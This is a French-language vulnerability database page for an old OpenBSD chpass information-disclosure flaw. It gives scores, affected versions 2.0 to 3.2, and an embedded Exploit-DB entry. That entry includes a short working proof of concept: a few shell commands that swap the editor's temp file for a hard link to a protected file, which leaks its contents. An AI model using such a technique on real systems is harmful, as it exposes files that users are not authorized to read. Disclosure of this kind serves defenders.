Faiblesses connexes
CWE-ID |
Nom de la faiblesse |
Source |
CWE-200 |
Exposure of Sensitive Information to an Unauthorized Actor The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. |
|
Métriques
Métriques |
Score |
Gravité |
CVSS Vecteur |
Source |
V2 |
3.3 |
|
AV:L/AC:M/Au:N/C:P/I:P/A:N |
nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 22210
Date de publication : 2003-02-02 23h00 +00:00
Auteur : Marc Bevand
EDB Vérifié : Yes
source: https://www.securityfocus.com/bid/6748/info
It has been reported that a problem with chpass included with OpenBSD may allow local users to gain access to the content of specific files. This vulnerability requires that lines in the target file be constructed in a specific format. This problem also affects the chfn and chsh programs which are hard links to the chpass binary.
# echo "shell: secret_data" >/tmp/sec
# chmod 600 /tmp/sec
$ chpass # ^Z in the editor
[1]+ Stopped chpass
$ rm /var/tmp/pw.Loi22925
$ ln /tmp/sec /var/tmp/pw.Loi22925
$ fg # then quit the editor
chpass
chpass: secret_data: non-standard shell
Products Mentioned
Configuraton 0
Openbsd>>Openbsd >> Version 2.0
Openbsd>>Openbsd >> Version 2.1
Openbsd>>Openbsd >> Version 2.2
Openbsd>>Openbsd >> Version 2.3
Openbsd>>Openbsd >> Version 2.4
Openbsd>>Openbsd >> Version 2.5
Openbsd>>Openbsd >> Version 2.6
Openbsd>>Openbsd >> Version 2.7
Openbsd>>Openbsd >> Version 2.8
Openbsd>>Openbsd >> Version 2.9
Openbsd>>Openbsd >> Version 3.0
Openbsd>>Openbsd >> Version 3.1
Openbsd>>Openbsd >> Version 3.2
Références